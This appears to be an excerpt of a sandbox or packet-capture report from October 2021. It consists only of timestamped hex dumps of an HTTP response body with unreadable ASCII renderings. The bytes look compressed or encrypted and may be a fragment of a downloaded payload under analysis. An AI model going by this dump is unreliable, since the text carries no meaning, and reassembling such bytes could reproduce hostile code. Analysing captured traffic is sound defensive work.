                                                                        2021-10-14 08:47:23 UTC98INData Raw: 50 d0 d7 e2 3e 31 f2 d4 db 0e 8b c1 9f 50 a6 9e 3c 88 b6 56 8b 83 2d 05 6c 2c 85 ec 69 0a 6e ce 28 a4 3d cc 6e f7 f9 de c9 ac 28 2e a4 79 7a 4f b8 93 99 24 48 24 0e 5e cc da 75 e2 89 3f fc 65 f8 ab ca 3a 61 e3 be 59 00 31 1d 4d 1c 7a 32 19 7d 85 3d e5 a0 31 4a b2 fb 57 ba 47 0f d4 6b ef 85 01 ae 13 55 8d 9d 71 05 ea bf ce de 8f 3b 22 06 53 69 19 cb fa 09 c2 6f 5b 29 ae 66 a0 00 ec 78 30 e2 8a 3e 49 db 34 a4 62 68 3f d5 e2 35 64 08 fe 52 98 c2 01 4f a2 29 88 a6 f0 d7 d3 a3 1b 8e 78 87 ed 20 3e a3 a0 6c f8 5c 9a 48 37 0e a6 b8 97 fa 90 b3 b5 4d ac 92 5d 35 eb 49 fb e3 33 71 54 81 46 1e 0c a5 f8 09 c1 3c 51 3d cf 33 28 aa c6 21 07 51 06 d4 cc c1 85 5e b4 69 b1 3a 05 3c c8 00 d3 80 f0 b6 11 ea 0e 08 5b 79 ca 8b 96 2f 7d 5e 33 d5 9a e6 25 55 b3 32 41 3d 6e 62
                                                                        Data Ascii: P>1P<V-l,in(=n(.yzO$H$^u?e:aY1Mz2}=1JWGkUq;"Sio[)fx0>I4bh?5dRO)x >l\H7M]5I3qTF<Q=3(!Q^i:<[y/}^3%U2A=nb
                                                                        2021-10-14 08:47:23 UTC99INData Raw: fe 0d 9d 62 eb 1d 42 60 8b ef 6c 25 45 53 74 26 83 0c fe e5 24 3c 38 1e 65 2a 39 bd 77 fa 47 eb 1e bf 27 37 ef fe dc cb ab 2b 93 c1 ab 41 dc ed a8 61 3f 3c 4b 2d 34 da 67 df 5a 3a 41 71 87 34 3c eb d2 b3 d7 cb 89 21 c5 3d 39 0c ed fa ee 34 4a 2c d9 0d c6 90 fd 2a 42 7e 47 6c cd 1f f2 50 8f 1e db 72 df e1 36 53 79 22 be 89 08 8b fa 19 f6 f2 9c 47 b5 1e 14 9f d9 1c 1d ca fe 76 b0 7e 12 7b ed fd 8e bf ff 0d 69 60 cc 56 91 21 74 b3 df 75 eb 76 59 14 b6 cb a7 a3 50 45 d2 e6 eb 13 8e 6f 0f a6 e2 92 39 74 25 ba c9 9d e1 f4 39 ca 7c db af 6c 9b 24 46 9f c9 93 2d 35 9d f4 64 11 33 e9 a7 6d ac 9c 94 b8 c1 f6 4a f6 84 5b 52 3c f2 ec c6 11 7c 3b d5 a5 ad a9 e7 8f 2d b2 fb 3e 39 01 33 2c 8d 1e 29 f8 d2 0d 31 01 8e ba e2 c6 2e ca f7 7e 10 cd ef 8a fc 86 77 62 73 fd aa
                                                                        Data Ascii: bB`l%ESt&$<8e*9wG'7+Aa?<K-4gZ:Aq4<!=94J,*B~GlPr6Sy"Gv~{i`V!tuvYPEo9t%9|l$F-5d3mJ[R<|;->93,)1.~wbs
                                                                        2021-10-14 08:47:23 UTC100INData Raw: a6 6a 2b a5 d8 52 d5 b2 14 1a 84 47 ea 27 20 df 6e b8 d0 31 7a 44 37 0c ba c9 70 fa bc b5 80 7b 92 c6 cd 60 14 4e db e7 29 72 4f 10 45 1e 23 74 f8 09 0b 2a 42 28 84 2d 28 aa cc 2d 14 56 14 45 06 ec 80 73 af 7e a6 36 6a 58 cc 17 27 d0 cb be d7 e8 0e 1c 1b 6b d8 ab 9d 0b 54 4f 31 a0 de e2 25 4e 6b 28 95 3c 43 7e 2a 1e 76 d5 29 61 68 98 e3 9a 49 d5 09 5b 67 48 bd 09 c7 4d 3e 75 e2 90 e4 98 2e 3a 29 bb 5f 5f 3a b2 a2 b4 8e e3 13 88 a0 01 95 d4 db 11 14 c8 c7 5b 24 fb de 42 b5 93 b4 34 1d 5f b8 7a ce 96 65 16 76 0d 0c 8c fd 40 ba 01 87 e7 44 70 55 93 66 10 47 cd ae 6a 21 da 89 17 4d 47 33 c8 bf ca 44 7d 08 ee 6c c5 e6 5a d6 61 bd 99 fc 9e fd d2 e9 28 ca 2b 28 a2 d2 de 78 d7 3b da 9e 97 79 c4 79 7b 8d a0 e8 70 b0 e7 1a 1a 44 90 9d 06 d4 02 c9 ce b5 38 89 c5 f4
                                                                        Data Ascii: j+RG' n1zD7p{`N)rOE#t*B(-(-VEs~6jX'kTO1%Nk(<C~*v)ahI[gHM>u.:)__:[$B4_zev@DpUfGj!MG3D}lZa(+(x;yy{pD8
                                                                        2021-10-14 08:47:23 UTC102INData Raw: ca 8b 6a 52 47 b8 fc f9 15 b2 c0 63 2c e0 92 22 1d e8 45 c8 b7 ee f7 29 b4 66 cb aa 71 0a bd 6a 8f c1 e3 3e 27 9b f0 1a 91 2e f7 53 d4 8a 92 85 c6 cf e6 4f e5 7c 4c 78 b1 5d 90 6a 11 6d 34 d5 a8 40 ae cb 92 29 d6 fa c1 38 29 03 00 e9 03 3b fd d6 1f 4f 07 9f 44 e7 c2 b1 e3 1e 6b 17 c6 85 23 ed 83 6b 83 62 c2 af c4 17 ee 8b 04 0a 32 c4 03 6a 51 df d6 20 3e df 8d e5 6b c4 1e 8e f6 a3 64 32 2f c6 87 14 99 c7 45 cd f2 8c b2 d6 8a b0 73 0c aa 5f 1d 17 67 e4 5d 9b 93 95 fa fd 41 e1 5d 42 29 ed a9 98 cb 37 68 85 af 82 43 8b d2 b2 50 12 83 e8 78 66 40 be 29 35 14 15 1d f1 ec da 75 03 c0 9f 54 19 06 3c 99 aa 50 ad 0e 2b 05 7d 2a 95 05 96 27 4c cf 4b 8d 3c c4 71 30 1d f2 cd 87 0e 21 ae 79 63 55 59 81 4b 2c 63 05 71 2a c3 db 71 fb 87 3c 8f 64 07 aa e2 58 b4 9c 2d 5f
                                                                        Data Ascii: jRGc,"E)fqj>'.SO|Lx]jm4@)8);ODk#kb2jQ >kd2/Es_g]A]B)7hCPxf@)5uT<P+}*'LK<q0!ycUYK,cq*q<dX-_
                                                                        2021-10-14 08:47:23 UTC103INData Raw: 35 c7 51 5e 65 87 3a 5c 6d b4 32 17 eb 22 60 ee 63 68 3e e5 93 05 9f d1 b6 c4 92 87 7b 47 42 b5 6d 66 16 54 55 a1 1e 95 27 89 1d 5e dd 11 e9 8d 33 6c e8 0a 72 6f cb c3 a6 c7 64 d2 93 f7 80 d7 00 c3 2a 9a a6 24 b5 b4 34 86 d7 3d f6 1c 8f 62 df 5c ff 94 a1 e8 e8 b1 e9 14 41 a1 91 9d 02 59 0e a4 f5 b8 57 24 aa 30 47 24 e3 8c a4 01 69 b6 5c a0 c0 ae ab 78 10 73 6a fe 7e eb 24 56 e7 ad 7e ae a7 87 90 62 4b 8b e1 6d 4a c4 51 21 64 cb 7d c8 d6 51 b1 ae 2f da 82 2e 2b 42 91 ab c3 62 af 65 98 d0 c4 95 dd 6d f3 43 dc 6f 28 e8 d4 6d 6e 2e 2c c2 6f 3e c0 ec 99 45 73 3c 73 cd 79 f5 79 07 f6 55 57 6d 2c 6d 1e d7 ef 4b 2c 26 12 9f 27 0a a3 6c e9 91 f6 05 ad 22 cc ee c3 c8 d9 57 51 b0 c5 bd 4e a8 66 ad 61 24 32 4f c4 26 f2 69 cc 25 35 50 8f 82 21 16 16 56 42 ca d8 88 27
                                                                        Data Ascii: 5Q^e:\m2"`ch>{GBmfTU'^3lrod*$4=b\AYW$0G$i\xsj~$V~bKmJQ!d}Q/.+BbemCo(mn.,o>Es<syyUWm,mK,&'l"WQNfa$2O&i%5P!VB'
                                                                        2021-10-14 08:47:23 UTC104INData Raw: f9 53 6f 84 a3 98 5c 47 f7 50 32 92 fe af 92 c5 3e 62 73 ae bf 42 b8 bb b3 7c 13 8b 9d ed 62 40 a5 3c 2c f6 07 39 e1 f5 d1 11 32 3f 9e 7c 7c 96 53 6e a0 5a b9 02 3b 16 64 2c 9c f3 8f f5 43 e0 3e 88 3d 84 75 09 75 d9 cd 87 16 38 b1 6a 7a 53 57 9a aa 20 b1 26 5f 5a ca cc 4f 79 85 3f f4 60 08 b9 ee 37 77 95 32 43 fe 3a 4c 58 1e 2a 34 79 7f 84 35 fe c6 49 49 9e fb 59 64 82 72 a8 77 ea 9a 0f bd 08 4e 98 63 61 21 fc 9a 32 a2 ad 36 26 13 49 0a 85 c1 e4 fd dc 60 42 26 b6 0a ba 1e e0 82 2e c7 8d 2f 44 c4 72 72 5d 65 53 63 f0 3d 62 12 ef 41 8e 34 19 9d b2 06 d2 de c1 59 d2 a7 0f e2 93 63 1e df 29 a2 4d 65 d4 4f 85 5b 25 f8 b8 9e 63 ea ba a6 49 5b 92 d0 b1 d9 1c 4e c0 f8 1c 66 aa 21 6a 13 0b 72 76 be eb e8 bc c6 08 be 3d b9 ce 21 07 5d 0b d4 cc c1 83 6d 90 7a a2 2f
                                                                        Data Ascii: So\GP2>bsB|b@<,92?||SnZ;d,C>=uu8jzSW &_ZOy?`7w2C:LX*4y5IIYdrwNca!26&I`B&./Drr]eSc=bA4Yc)MeO[%cI[Nf!jrv=!]mz/
                                                                        2021-10-14 08:47:23 UTC105INData Raw: c5 90 50 85 73 76 be c0 7b b4 61 89 c9 df 9f 2c 92 de 63 da 6b 44 a6 64 6c 6a 38 1b 4e 7e 36 ca eb 8b 35 d5 c2 72 eb 72 e0 69 0b e9 50 85 5a 02 92 1f f1 98 29 38 27 16 84 3b 06 bd 7f fc 99 fa ff b3 18 38 e8 f8 99 79 54 2a bf da ae 42 c7 ef a5 7e 37 c7 51 ff 2c f3 6a d5 3e 36 96 59 b8 0c 01 1e 05 e4 c9 d8 86 5c f6 39 26 1e 0c e1 d1 37 48 29 ac 1c d3 6e f8 19 45 6e 4a 73 d6 cc c6 25 8c 32 cc 63 a1 f0 22 40 75 20 d4 91 16 9c 00 0e d8 90 89 45 bd 05 96 fe 9e 8e 1c ca fe 43 0b 79 12 60 95 c2 71 be d7 1b 49 62 3b a9 7f 36 65 5e db 59 f6 70 c8 a9 52 f5 e5 b4 52 47 b0 f9 e2 13 9b 6f 7f 3d 1e 93 1f 0f f1 b8 c1 84 e2 29 02 f4 7d ca a0 08 78 24 6a 8b d4 fa 30 3c 9d e1 03 88 21 17 ac f9 b7 83 fc a0 c0 e7 4b f4 14 1a 7f 3e ea ff dc 00 7e 36 ca a6 5b b7 c6 7d 2e e5 e1
                                                                        Data Ascii: Psv{a,ckDdlj8N~65rriPZ)8';8yT*B~7Q,j>6Y\9&7H)nEnJs%2c"@u ECy`qIb;6e^YpRRGo=)}x$j0<!K>~6[}.
                                                                        2021-10-14 08:47:23 UTC107INData Raw: c1 38 5f 2f b6 1f ad 1d 86 6b 40 7b 84 3e 4b e5 cd ca e1 62 4c 64 f0 3d 65 6c 48 5c 98 c0 0b b5 a4 6a 2d a7 d8 52 df b2 14 b3 ec 11 19 20 36 b4 76 5e d5 5e 87 46 4c 08 b8 b2 6d 94 21 b3 9e 42 18 5e a2 ca 15 58 f9 6c 02 72 5e 0c 42 08 06 aa 8b 0b c1 22 3f 28 f6 a1 2c a8 d7 25 01 3f c6 9d da 3b 0d 5e 83 72 a3 43 15 2c cc 13 2f fa d2 b4 09 fd 03 1e 25 ed d1 75 9d 25 7a 32 37 ce 89 e6 27 3f a7 2e bf 38 54 7f 2e a9 1b 8e 2f 61 7f 9d e1 eb 47 d4 09 5f 75 6e d7 99 c2 4c 34 53 29 9a 3a ab 2e 11 5c b4 5e 5b 51 41 9c b4 84 f4 54 be e0 d1 68 2b 03 6e bf fd c7 51 54 d1 b6 2d 7c 98 6a 32 01 5d 2d 52 8f 80 68 3e e5 0f 0c 86 e3 49 c4 92 31 e6 4e 58 5d 93 66 16 58 c9 a8 05 af d8 89 1c 4d 71 1a f5 85 cc 6c e8 02 ee 66 c7 f5 52 ec 7f d2 08 e9 60 f6 d3 c1 32 91 3a 2a bc 43
                                                                        Data Ascii: 8_/k@{>KbLd=elH\j-R 6v^^FLm!B^Xlr^B"?(,%?;^rC,/%u%z27'?.8T./aG_unL4S):.\^[QATh+nQT-|j2]-Rh>I1NX]fXMqlfR`2:*C
                                                                        2021-10-14 08:47:23 UTC108INData Raw: 28 bc a1 35 21 f0 6b a5 6c 9f 6d e8 e3 71 ad d7 15 55 67 24 25 41 3e 7d a1 78 64 fe 67 52 08 5f e2 23 b5 52 4d ae fe c2 ff 8e 67 66 3a 6d 95 33 1b f5 af dd 8f e9 d7 8d cf 7c c0 8c 5e 3f 22 7e a7 26 ec 23 32 8b 7d 0c 97 31 e8 b9 c1 b2 ae 24 bd c1 ed 5b c9 94 5e 7e 39 fc 72 c4 11 6d 3f de a3 47 80 68 83 2f c3 dd 2e 39 05 15 0e 9a 19 12 12 d6 1c 32 09 13 43 e3 ea 29 f2 1a 70 05 c8 c2 7a e9 83 67 3e 63 d5 bd d0 12 c0 37 0e f4 39 c0 bc 69 2a f0 fb 22 11 de df f3 43 29 05 85 e3 b3 e9 24 29 d9 97 fe 8c ff 71 6c 89 82 b9 c2 a6 42 0c 2c ad 49 94 38 fd e6 5c 85 91 9b bd f7 41 e1 5d 75 94 fe af 92 f2 81 71 7b a4 94 24 5c ba 4d 57 0c a7 00 6f 60 46 b9 a2 2f ea 14 30 f5 f0 cd 26 84 c1 9f 5a 5e c4 3c 99 aa 50 6d 0d 08 2d 5b 2c 8d f1 9a 1d 48 e4 08 a8 3d ce ab 09 fe d8
                                                                        Data Ascii: (5!klmqUg$%A>}xdgR_#RMgf:m3|^?"~&#2}1$[^~9rm?Gh/.92C)pzg>c79i*"C)$)qlB,I8\A]uq{$\MWo`F/0&Z^<Pm-[,H=
                                                                        2021-10-14 08:47:23 UTC109INData Raw: 78 b8 03 9f 60 1f 73 2f 94 f5 84 43 ed 53 b5 54 77 c5 c3 9e b2 e1 54 3c 83 82 40 1e d5 dd 68 bf ed c7 51 54 f2 50 07 6d 83 db f5 17 77 21 42 b7 63 97 c1 3b 19 1d 97 84 72 c4 92 86 cb 42 49 84 e7 5d 16 54 c8 c7 52 b5 d8 83 c1 76 b4 1c f5 ab e6 6b c2 0a ee 66 97 87 59 c7 66 d2 0f fe b3 f7 ff c3 21 9a 3a 2d 92 bd 14 79 db 3d f6 80 86 7d d5 7c 02 94 a1 e8 30 b8 f6 1f 4b 5f 91 9d 6c c4 07 b2 fc b4 38 8d aa 30 4d 3b f8 9f a0 01 f3 b3 43 b2 26 af 87 74 b1 09 60 ff 72 ef 08 1b f8 be 6d aa a5 96 94 7d fb 74 e0 41 c7 c6 2a 2f 36 c9 79 de e8 cb b3 ae 25 cc 98 41 99 72 98 a1 29 6a bc 61 74 c1 c0 9b cc 1e d9 6f cb 6c 40 ef a6 da 6a 38 0e 4b 6b 2f cc ee ab ae d8 3c 75 d0 eb e2 6a 03 f7 57 5d 63 37 85 0e f2 47 24 37 34 1d 8a 24 01 a1 68 60 be e7 01 b3 27 22 fe ff cf c6
                                                                        Data Ascii: x`s/CSTwT<@hQTPmw!Bc;rBI]TRvkfYf!:-y=}|0K_l80M;C&t`rm}tA*/6y%Ar)jatol@j8Kk/<ujW]c7G$74$h`'"
                                                                        2021-10-14 08:47:23 UTC111INData Raw: f3 fd cf 5c c4 01 8f f6 a0 4c 25 2c d9 90 e0 b0 d3 59 cf 83 5c b3 d0 a4 b3 08 2d b7 5f 19 3d fd fe 5d ae d2 8f 99 54 41 e1 57 5d 3b fe af ff bd 31 64 61 ae ae 4b b8 75 b1 50 b4 8f f2 6b 8e 40 af 3e 00 ed 11 31 e7 97 62 0c 27 cb 93 58 19 22 3e 99 aa 57 cd 8e 2d 05 66 27 84 94 f4 0b 42 c6 23 ae 16 9c 64 0f 97 96 cd 87 1d 46 ea 79 72 52 55 96 b2 53 dc 27 73 5b a2 c3 70 ff 8f 13 d8 6e 02 82 ee 32 66 9b 42 99 02 3b 6a 6a ad 7a 36 08 5d 97 24 fe 81 c6 4e 9e f7 3f 7e 38 1c df 04 fe 9a 0b a8 18 4c 94 0c b1 2b e3 b2 cb 8b 64 39 22 04 33 f6 19 c3 ee 98 bb 43 51 24 bd 0a b4 6e 8a 7c 2f e1 ab a1 9f cf db a3 62 67 5d 68 8c 62 62 03 ed 82 9f c0 c6 a4 86 2d b5 a5 d8 52 c1 a6 39 a8 ef 9d e7 2a 1e 8d 5e 6d de 80 8d 42 1d 07 a5 b2 69 f9 bc a9 9e 25 11 cf ae ca 14 4e d1 f0
                                                                        Data Ascii: \L%,Y\-_=]TAW];1daKuPk@>1b'X">W-f'B#dFyrRUS's[pn2fB;jjz6]$N?~8L+d9"3CQ$n|/bg]hbb-R9*^mBi%N
                                                                        2021-10-14 08:47:23 UTC112INData Raw: 08 66 d7 6b ee 08 11 d0 e9 6f aa a1 be ba 7f 42 73 8f 39 5d c6 20 24 67 cd 16 14 fc cb b9 b4 3f da f7 b5 83 42 97 89 c9 69 bc 6b b0 96 c2 8a d4 bb dc 6d cb 6b 3c 9e d5 6d 60 35 06 5e 02 f4 c8 fa 89 35 d6 26 64 a8 92 e4 6a 05 e0 6c 47 73 39 99 13 fc cd 24 3c 27 14 f4 32 14 b5 75 d4 26 e6 01 b2 1c 20 ea ef df dc 5c 02 ac c1 bd 4c a8 e7 ac 61 24 15 5c da 1d e2 6c dd 27 02 64 71 83 07 0c 16 2b 23 01 da 8c 2b cb 00 3c 0c 7c 0f c3 3f 4e 10 b1 02 c7 9a d1 62 57 6d 44 44 f2 18 ee a8 e1 4a c6 70 ae c7 02 51 7d 2a d6 9e 1e 98 f6 37 a5 88 8c 46 a4 1d 98 53 81 b4 1d ce 9b a0 a1 7b 18 b0 f0 3b 67 64 c4 d2 dc 64 33 a9 6f 2d 74 b6 cb 72 f8 08 71 1f 48 ce e4 7e 50 47 a3 30 f2 cb 9d bd 73 3d f3 98 18 23 e5 b2 d8 91 fc f9 45 05 7e ca a0 7d 74 2d b2 97 1d f9 29 2c 45 26 13
                                                                        Data Ascii: fkoBs9] $g?Bikmk<m`5^5&djlGs9$<'2u& \La$\l'dq+#+<|?NbWmDDJpQ}*7FS{;gdd3o-trqH~PG0s=#E~}t-),E&
                                                                        2021-10-14 08:47:23 UTC113INData Raw: f1 08 51 be 3c 03 da 78 e0 9a 1a a9 0c 63 6e 62 5c 2f c8 31 d3 9c 92 31 22 13 46 7a 13 3d e5 db d2 44 52 a0 01 12 aa d7 36 13 d4 ea 86 38 5e c8 d9 ae 4e 71 47 71 ea cb 63 2f eb 59 87 fa 77 48 a2 05 84 ba d2 4b d9 a3 00 a9 f5 b8 1f 21 1a 97 59 02 28 5f 8d 42 30 69 45 b3 69 fd d3 60 9c 48 9e d8 78 a5 c6 4c d1 fa 0b 1d ab 21 46 18 13 52 eb 02 d0 3b 49 26 b6 5f 29 86 e4 26 79 a9 1d 2a cb ea ef 89 82 72 a4 51 d4 2f cc 1d 3a 5b b3 67 0b f9 00 00 25 82 d2 75 91 1c 3a 5a 32 cf 98 e9 3a 77 49 2e 93 1e 45 01 d6 1f 74 d3 28 0e 89 ba e3 96 26 04 0b 5b 76 6f 62 66 12 4e 3e 7f 36 ff 1b 88 2c 6c 4d 81 4d 54 3e d6 95 ab 85 1c 3f af 9c 28 f8 2e dc 62 91 dd 1d 46 88 74 a5 2d 7c 93 b8 2d 1b 64 20 78 df 97 77 33 1b 0e 20 8d 82 49 c6 92 81 f4 4b 47 9b 81 6d 16 45 c2 b7 3f 4b
                                                                        Data Ascii: Q<xcnb\/11"Fz=DR68^NqGqc/YwHK!Y(_B0iEi`HxL!FR;I&_)&y*rQ/:[g%u:Z2:wI.Et(&[vobfN>6,lMMT>?(.bFt-|-d xw3 IKGmE?K
                                                                        2021-10-14 08:47:23 UTC114INData Raw: ea 30 cd ed e1 18 db 3e 60 4f 5e 8d 37 99 b1 51 ac 0c d3 04 40 3f 8e f2 80 dd d3 db ea bf eb 49 5e 09 f8 f3 c1 98 05 21 a3 79 63 58 59 81 4b 2c 63 2a 70 df 7a d3 69 29 5f 2c f0 60 12 b9 ed 37 77 96 32 40 fe 3a 4c 4b 25 a8 cd fd 8e 9a 2f e9 a2 cf 5a 95 ee 61 40 3b 30 de 68 e2 8d dd 33 00 59 8f 51 63 22 e3 a9 c7 bc ad c4 23 2e 5c 62 76 3f e5 f7 c5 52 56 41 66 19 b2 0b f3 51 3c e0 86 2f 4a dc da 5b 4f 4c 5d 69 8c c9 63 03 e1 4f 9d a5 c8 b3 a3 0f 9d b4 cb 53 d2 b2 1a bd f8 63 e0 0c 25 bd d0 da d7 d0 3a 4d 2f d0 63 8c 40 00 43 4e 81 5b 87 c4 a2 db 1f 51 f8 0e 02 5e 5f 53 46 1c 0c 72 eb 0e cf 00 51 32 f7 b0 23 b0 38 20 3a 5d 24 e3 37 12 7f 6e 90 79 a2 2f 0e 32 f1 e9 2c ad d1 b6 87 4e 03 10 9c a7 c0 71 88 3d 6b 42 39 de 82 fd 39 ba b6 03 b3 2d 44 76 45 e7 75 d5
                                                                        Data Ascii: 0>`O^7Q@?I^!ycXYK,c*pzi)_,`7w2@:LK%/Za@;0h3YQc"#.\bv?RVAfQ</J[OL]icOSc%:M/c@CN[Q^_SFrQ2#8 :]$7ny/2,Nq=kB99-DvEu
                                                                        2021-10-14 08:47:23 UTC115INData Raw: e7 71 c7 6c e7 6f 7e bf 45 53 76 3b 9d 1b 86 af 34 39 23 10 99 50 5d b4 7f e9 fe de 00 b2 3e 5e cc ef d9 d1 55 2a bf e4 fd 11 ef 6f ad 61 24 8e 2d 90 34 f6 6d df 23 51 03 70 83 09 16 ce 3a 9a 46 f3 8c 21 d5 45 63 1b 13 ff e8 3f 48 38 b7 33 c2 90 85 34 55 6d b5 6c dc 0b f8 bd 8b 0a a0 71 a4 ef 37 42 78 3d 3b 98 25 9c fc 74 b1 88 8c 42 b7 61 dc 29 b6 b1 15 dc f7 43 96 7a 12 60 f6 f0 75 be c2 01 46 8f 32 85 6d 26 6e a5 da 64 ff 6c 4f e0 49 e6 8d bd 78 58 a3 f9 ef 13 9b 62 7b d2 e1 be 39 1d e2 85 ea 9a fe ff 36 dc 79 ca bb 70 7f db 6b a3 da ea 58 73 9c f0 0f 95 4a af ac d5 a2 5c 8d a6 d2 e2 4f f0 7f 42 80 3e c6 f1 c0 06 b7 29 1c 3a 78 a8 cb 82 23 d0 e6 3a 39 14 1a 1c 6c 0c 16 ef d0 1e 4f 58 9f 44 e7 e9 fe 9c 58 60 01 da f5 83 fe 86 61 8d 77 cd 57 c5 2a ef 97
                                                                        Data Ascii: qlo~ESv;49#P]>^U*oa$-4m#Qp:F!Ec?H834Umlq7Bx=;%tBa)Cz`uF2m&ndlOIxXb{96ypkXsJ\OB>):x#:9lOXDX`awW*
                                                                        2021-10-14 08:47:23 UTC116INData Raw: f4 7a c3 a5 07 38 c2 8c e1 20 3c 65 4c 6d d4 45 a5 50 37 06 b3 9a 5d fa bc bb ea 5a 94 cf b9 c0 0b 5d c2 fd 03 63 59 3f 53 e0 0d 58 f5 18 d8 32 d2 00 88 5e d7 55 d9 37 05 58 1c 3b c0 f2 8c 8b 82 5e 95 38 14 28 ca 06 28 10 50 9e 09 f9 0b 00 5d f0 d4 75 97 02 6b 4e 28 c8 9f f3 20 c8 88 2f bf 3d e0 7f 2d 0a 5c 7e 2f 61 7f 93 0e 91 49 df 21 86 7e 78 b2 95 df 41 2d 78 3e 81 e9 96 35 94 53 99 4e 5d 45 83 9f b4 8a f7 7e 39 89 2f 97 cb c7 71 9a ca d6 5c 40 07 8f 01 7a b9 b9 2d 1e 64 26 78 df 91 77 26 1b 0e 20 8b e0 4d d5 9b b9 f2 b1 a7 6a 8d 7f 05 59 c9 b9 08 ac 26 88 31 40 43 63 bc ac cc 68 fe 03 9a e7 d6 e3 58 d1 66 a9 46 ff 9e f3 71 74 02 af 3b 2d a0 a7 07 74 d7 2c fb 9a 78 7c f9 5f 02 ef e5 e9 74 bc de 18 63 5e 97 8b 0b b1 86 b2 ea b5 3a f6 e3 31 4d 3f 74 28
                                                                        Data Ascii: z8 <eLmEP7]Z]cY?SX2^U7X;^8((P]ukN( /=-\~/aI!~xA-x>5SN]E~9/q\@z-d&xw& MjY&1@CchXfFqt;-t,x|_tc^:1M?t(
                                                                        2021-10-14 08:47:23 UTC118INData Raw: 47 a3 c0 dc 0c 92 ea 4b 2c e0 93 b3 57 f5 bb cd b1 e0 ec 1a ca 7c 6d aa 75 65 de 6a 8f da fe 30 31 b6 b3 0b 86 34 f1 53 d4 8a 88 85 d2 08 e7 4f eb 62 07 68 11 d8 e6 d0 14 6d 2f cf a0 ad a9 e7 80 37 da f0 3f 28 00 06 fc 93 21 3f e9 f8 06 27 1b 9e 55 e6 fc d6 e0 32 62 16 cd ef 8a fc 86 7b 62 73 fd ab ef 04 c3 2f 0c 9b fa e8 0c 63 46 d9 d7 20 3a e6 d8 e7 6b 84 5a a6 e5 a5 64 23 29 d9 66 d5 c1 c3 c8 cf 89 88 04 c1 58 3e 23 2c ab 5e 12 29 fa 68 ea 86 5f 9c 91 59 6a c3 55 54 23 26 b7 f7 35 31 71 71 a2 a9 43 ab 65 b1 52 18 8f da 89 62 40 a5 07 cb e8 14 3b 7d ed ce d8 2a c8 8e 54 47 47 3b b3 a0 49 83 1e 2d c7 6c 2c 8d 07 97 0b 53 da 23 ad 05 6a 75 09 f8 f2 dc 82 08 3b 56 78 5e 58 4f 83 b1 a3 f8 15 13 4e c7 c9 74 ff 94 3a e9 81 07 86 f3 30 4e 8a 28 59 06 33 ec 69
                                                                        Data Ascii: GK,W|muej014SObhm/7?(!?'U2b{bs/cF :kZd#)fX>#,^)h_YjUT#&51qqCeRb@;}*TGG;I-l,S#ju;Vx^XONt:0N(Y3i
                                                                        2021-10-14 08:47:23 UTC119INData Raw: ff e1 a7 7d 92 b2 5d 8f 77 2b 72 c2 b4 2f 3f e5 05 1d 8f e7 61 e0 97 87 e1 21 d2 94 92 60 79 cc c9 a8 0f be c9 8d 15 31 b6 19 f5 ab c1 7d ef 1e c6 89 d2 e3 5f d0 e9 d5 0f fe 9f e4 e1 d2 34 8c 12 08 af bd 12 db c6 23 e2 94 92 55 76 7c 00 9e b0 ef 60 90 19 1b 61 58 86 10 05 c5 07 b3 f9 ab 29 92 bc 18 6b 3e fa 99 02 10 67 a6 57 a6 16 0c 87 74 18 20 5d fd 7e e5 20 ab f8 be 67 93 6a 97 94 7d 4b 61 c8 82 5e c6 2c 38 e8 cc 79 de ff d8 93 bf 05 da 8e cd bd 42 91 a0 7e 79 9c 75 8c d5 e8 29 d2 93 f8 7b e3 ae 50 e6 d3 7a e7 3f 04 58 6c 2d eb eb a2 3c cc b0 4c c7 66 e4 c8 12 d7 50 47 66 11 30 1f fb ef 21 11 e4 11 9b 2d 02 38 78 ed 91 e6 12 90 25 10 f9 f8 55 ee 55 2a be 66 ac 68 d3 ea b9 49 8d 39 50 d9 21 de aa de 21 2c 57 fc 84 0d 01 15 3e 6f da fb 9a 37 58 07 26 1a
                                                                        Data Ascii: }]w+r/?a!`y1}_4#Uv|`aX)k>gWt ]~ gj}Ka^,8yB~yu){Pz?Xl-<LfPGf0!-8x%UU*fhI9P!!,W>o7X&
                                                                        2021-10-14 08:47:23 UTC120INData Raw: 94 bd 40 41 e1 5d 75 0f ff af 92 ae 23 71 7b b5 2e 06 a2 45 b6 2e 54 8e f2 6f 6a 9d 59 2d 28 ea 31 19 d6 e4 d9 04 34 d3 8b 5a 5e a6 3c 99 aa 87 51 1f 2d 05 6e 04 aa fe 97 0d 6a e8 30 a8 37 ec 44 09 f8 f8 f4 4e 15 32 a8 6f ff 78 46 92 b4 3e 54 25 5b 76 c8 da 77 d7 a1 3f f4 75 75 59 e7 37 60 8e 39 48 14 54 91 43 1d 7c 59 e4 73 85 3f e9 8c f7 45 9f f1 50 ac 1f 34 32 69 eb 90 87 88 13 5d 8b 70 6c 38 ff ac e4 8b 85 3a 24 14 c0 62 19 c3 e5 e3 d7 57 79 8d b6 1b b8 29 c4 79 2f ed 90 16 a9 c1 ca af 5f 7c 58 46 cb 31 62 05 f1 d3 9f ca 18 b0 b7 11 96 8d 7b 58 d2 a9 39 8b ef 9d e7 36 1e 5d 5c 6d de 76 64 46 37 0c a8 ae 7d d3 94 b5 9e 4e 82 42 a5 ca 14 4f c5 e4 17 5a f7 20 46 14 24 5e fd 09 d6 3c 6a d1 f5 a1 22 82 2f 23 16 5f 34 9a cd ed 8a 59 9e 63 be 2a 2d aa cf 17
                                                                        Data Ascii: @A]u#q{.E.TojY-(14Z^<Q-nj07DN2oxF>T%[vw?uuY7`9HTC|Ys?EP42i]pl8:$bWy)y/_|XF1b{X96]\mvdF7}NBOZ F$^<j"/#_4Yc*-
                                                                        2021-10-14 08:47:23 UTC121INData Raw: 55 8e b0 22 69 90 73 8e d0 c9 e5 1e 92 f2 65 dc b7 40 f0 c6 67 75 2a 17 4f 6d 2f dd e5 a0 d4 db 10 6f d6 76 f4 66 2b db 41 53 74 11 bd 1d fb e3 1d d2 25 12 91 44 31 b7 7f eb 8e c3 12 a5 34 23 f8 f7 27 d0 79 23 cc 7e bd 4a cd f4 b4 72 39 39 41 c4 2a d6 97 dc 0d 3e 51 7f fd 41 00 14 29 5d c4 f0 90 23 d4 3e 35 11 0c da d1 28 48 29 b3 1f 39 91 d5 33 57 7e 57 71 cf 0d ee bf 99 2d df 8e a5 c3 23 42 7b 31 c1 b1 6f 8a fe 05 9b 7e 8d 46 b3 09 88 37 ac a6 0a ca e5 7c bc 69 ec 6b c4 ea 48 3a d1 04 51 6e 20 ba 79 3e 6c b7 c5 6d 04 72 6a 14 41 f3 d2 b4 52 47 b6 f3 f9 04 8a 76 77 33 f5 6c 32 37 d4 aa c0 8a f4 e7 fc a0 